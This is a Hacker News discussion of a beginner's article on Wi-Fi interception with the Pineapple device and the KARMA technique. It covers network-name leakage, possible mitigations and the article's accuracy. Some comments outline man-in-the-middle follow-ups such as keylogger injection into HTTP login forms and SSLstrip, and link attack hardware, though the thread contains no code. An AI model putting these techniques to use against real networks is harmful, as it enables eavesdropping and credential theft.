Hacker News new | past | comments | ask | show | jobs | submit login
Beginner's Guide to Wi-fi Interception (troyhunt.com)
211 points by nopassrecover on Sept 20, 2013 | hide | past | favorite | 41 comments



I don't understand why people are putting this article down by saying "Nothing Novel In it"; "i have been doing this for X years. I know all this stuff"; "This is too simple. Too Basic"

GUYS!!! It's titled "BEGINNER'S Guide to WiFi Interception" So OFCOURSE it's basic. It isn't meant for security veterans like you guys. The author is apparently a secuirty guy too, but he just WANTED to explain it in as simple as possible way


> ... each unsecured network is the Pineapple responding to a probe request from the iPhone with the name of the SSID it was previously associated with. The names include that of an old wireless router I replaced some years back, my parents’ network I was connected to interstate just the other day and an airline lounge in a far flung corner of the world.

Whoa, what? This is really how it works? This implies that anywhere you go with your laptop, someone can sit there and get a list of every wifi you've ever connected to. :(

I don't understand why this disclosure is necessary, since you can list all nearby wifis, even ones you've never connected to. Shouldn't it be possible for a wifi client to get a list of all nearby wifis, then only attempt to connect to the one it knows, without telling the others anything about what it's looking for?

Didn't finish reading the article, because it's going step by step and I don't plan to actually set up a Pineapple, but this surprising bit was the main takeaway for me.


Yes.

Want to know something scarier? Snoopy - http://www.youtube.com/watch?v=Vsn7_4qUdwk&feature=youtu.be .

Well worth the watch.



Yes, that's exactly how this works. The way to solve it would be for a device to compare the last known BSSID of an access point to that of the device it's about to connect to (similar to comparing MAC addresses). Except that almost no one does this.

http://en.wikipedia.org/wiki/Service_set_(802.11_network)#Ba...


This surprised me as well. I would speculate it is motivated by networks with SSID broadcast turned off. You'd never find them by parsing the network list.


Makes sense, but I've never ever used such a network and so would gladly turn off this feature. :(

It looks like the iPhone is (or was, as of 2012) uniquely bad because it leaks recently used MAC addresses, while it's common for devices to leak names but not MAC addresses:

http://seclists.org/dailydave/2012/q1/59


Potential solution on OS level: 1) when connecting to a network for the first time, remember its location 2) only send out those SSIDs that belong to networks which are close to your current location

Does anything like that exist? Maybe for Android?


How would that work with location unaware devices?


It wouldn't.


Troy's great strengths come from demonstrating to the average Joe just how easy this is. He's not going over board on the technical side because his aim isn't to get everyone doing this. By and large he's pushing companies with woefully insecure systems into securing them by using the media to spread the message. Though he usually targets companies with web based forms and authentication systems he appears here to be doing the same thing. If he generates enough chatter about it, more pressure will be put on those responsible to fix the problem.

P.S. The vague "that article rife with errors" and "it's pretty obvious those screen caps have been photoshopped to try and prove and incorrect point" comments are pitiful and pointless without some explanations. But ooh, I'm sure you are all important and busy with out the time to explain yourself.


If you want to know more about KARMA, we came up with it in 2004 and the original docs and code are on our website: http://www.trailofbits.com/software/#karma


You were involved in KARMA? I thought that was just Dino and Shane. Shane is working with you guys now too?


:-), my bad. Shane doesn't work for us. His name is listed on the research page, but I should add his name to the software page to credit him there too.


You can do everything that Pineapple does without Pineapple, I believe. The advantage here is that it's all in one place, the hardware's figured out, and it's accessible through a web interface.

And you don't have to know ten year's worth of knowledge to get useful (but probably illegal) stuff out of it.

At least that's what I'm getting out of this article.

I can very easily see a house being raided and this being used against the owner as evidence, though. There are very few legitimate uses for something like this, aren't there?


You can see a house being raided for owning a Pineapple...?


Nope.

I can see a house being raided because of other computer crime evidence, and the fact that the suspect owned a Pineapple would be used against him in court.


Ah the pineapple, a lovely single device mitm for all of your wifi based needs.

I've been looking into acquire one for months but I can't think of any use case apart that wouldn't be immoral.

I wonder if I could sit in a coffee shop and provide a faster connection than standard? I'd be like a smaller, slightly more malicious google in that I provide a service in exchange for sweet sweet packets!

Also, what's with all the posts from troy? I've been following him for awhile and it's curious to see these just popping up now.


Here is one moral use.

Don't do any mitm or forwarding, but just sit with the CEO or CIO with one in his office for a few minutes, and show him how his iPhone is suddenly connected to his home network.

Then you can explain all the implications of this. Including that this is a readily available device for low cost. And that this particular attack has been known and documented since 2004.

It would seem unlikely that manufacturers of devices relying on WiFi are unaware of this. Run a bar across their cages to get this fixed.


Article is hidden in Firefox+Ghostery unless Disqus is enabled.


Every Disqus article is with it, just unblock it.


Diasllow "apphb.com" and it works.


the article shows for me with Disqus disabled


Here is the advanced guide to Screwing with Wi-Fi: http://www.securitytube.net/groups?operation=view&groupId=9


Dear god is that article rife with errors. Almost every declarative statement made is incorrect.

This is someone looking for a sensational response without taking the time to wonder if the people reading the article, at least here on HN, are ready to call him out on his bull shit.


I've been doing IP networking from early 90s and I didn't find anything new in this article, except false claims. Also many attacks weren't as advanced as I would have assumed.

Btw. With Windos 3.0 Trumpet Winsock allowed you directly to snoop IP traffic as well as packet content. So there's nothing new with it either.

I also worked in networking department monitoring network issues, and it was painfully clear, that anyone who used telnet to access bank was easily monitored. (of course) Best thing was that banks didn't offer back then any other alternatives, except traditional POTS modems, which were just being replaced by IP networking.

Oh boy did I laugh about firesheep news, it was so obvious and over 15 years old trick.

I was naturally expecing this post to contain information how to MitM HTTPS and SSH sessions. Yes, users are stupid, and they might continue accessing services and login, even if cert isn't valid. As addition to that, they could have listed tips, how to create own cert authority and create "self signed" certs for every site being accssed with HTTPS. We're currently doing that in corporate environment. Only thing you need to arrange, is to use AD to get devices to trust this new cert. When you access facebook.com you'll get valid https connection with cert signed by IT. Yes, we can evasedrop and virus monitor also https connections, of course.

I'm sure there are many guys who have much more to add to this short list, what can be done.

Often with high security sites we opt to trust predefined exact public key fingerprint instead of any "publicly" signed cert. Because we all know the problems with official publicly signed certs and authorities.


I will agree with you that is sensational and a bit irresponsible, but there weren't any glaring inaccuracies. The only novel information in the article was that Wifi devices leak all their past access points to anyone -- if that statement is indeed true (and knows how many devices it's true for) (edit: apparently the technique has been around since at least 2006). The rest of it was a very basic tutorial on how to snoop on unencrypted traffic, which is usually not something people who have to read a tutorial on should be doing.


Well thank you, but that's not useful. Would you mind pointing out some examples of wrong statements? Otherwise I'm none the wiser :(


To be honest, the article isn't really all that wrong or sensationalist - It's a little bit simplified in some spots but for the most part is an accurate depiction of how simple it is to perform man-in-the-middle attacks on the unsuspecting with a device running Karma.

I'm not sure which exact points of article your parent poster has an issue with, though so I can't rebut his arguments.

The first paragraph is relatively straightforward - just posting to HTTPS isn't enough. Your login form has to be HTTPS too, and not mixed-mode. Inject a javascript keylogger into your login form which you served over HTTP? Don't mind if I do.

The rest of the article is just a tutorial on how to get to the point where you can do something like that, by using the Pineapple.

Yes, Karma does actually work like explained in the article, and yes, clients will connect to any AP running Karma or a similar implementation, and it will do it for the exact reason he stated: They will broadcast the SSIDs they 'remember'. Once they're connected to your AP, well, you're on the path between them and anything they try to visit. That's pretty much the definition of being a man in the middle.

The article doesn't go too deep into what you can do and simply mentions that you can take a look at HTTP traffic -- If you can look at it, you can modify it on the fly. If you can do that you can spin up something like SSLstrip[0], or drop in a java driveby or... well, anything you can imagine doing to traffic on the wire.

Note that the pineapple is not the only device that can do this. There's all sorts of things like the expensive and super sneaky Pwn Plug[1] to something like a hand-made minipwner[2] which you can put together with $30 and a bunch of spare time.

[0] http://www.thoughtcrime.org/software/sslstrip/ [1] http://pwnieexpress.com/products/pwnplug-elite [2] http://www.minipwner.com/


Given that it is a "beginners guide to....", it would be simplified and not go deep.


Looking again, it's pretty obvious those screen caps have been photoshopped to try and prove and incorrect point. Definition of circular arguing.


Can you be specific? I think it'd be interesting to a lot of HN readers if you could point out the exact errors.

I'm not super well-versed on Pineapple, so I don't know what's true/not true about what it does/how it does it.


You are ranting about it but don't give any information on what's wrong with the article..


You haven't actually defined what is wrong with it yet...


Honestly, the hype behind the Wi-Fi Pineapple is a little excessive. It's a nice little novelty, but it really doesn't offer anything you couldn't do with the aircrack-ng utilities (airbase-ng for conducting MITM in particular).


As someone that knows next to nothing about internet security, this article was definitely eye-opening. Can anyone suggest further reading on the topic?


Could you do this with a Raspberry Pi, a Netgear antenna, and a crossover cord? Very tempted to try this out, Linux style.


If the software and its dependencies can be compiled on the RPi architecture, it should.


I stopped reading the moment I felt this dude thinks "good old windows" and "microsoft windows world" are better than "the linux things", and from the comments here I think the article is indeed as lame as I suspected.


So you stopped reading an article because the guy does not use your preferred operating system then justify your bias from comments that (at the time of your posting at least) have no evidence that the article is "lame".

Well done.


There is a lot of oldschool guys who are very professional developers in their fields, but who are reluctant to change their OS. I don't think the latter is good or wise, but they are still very knowledgeable in their field. E.g. it's not uncommon to see an embedded Linux developer who uses Windows as his desktop OS.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: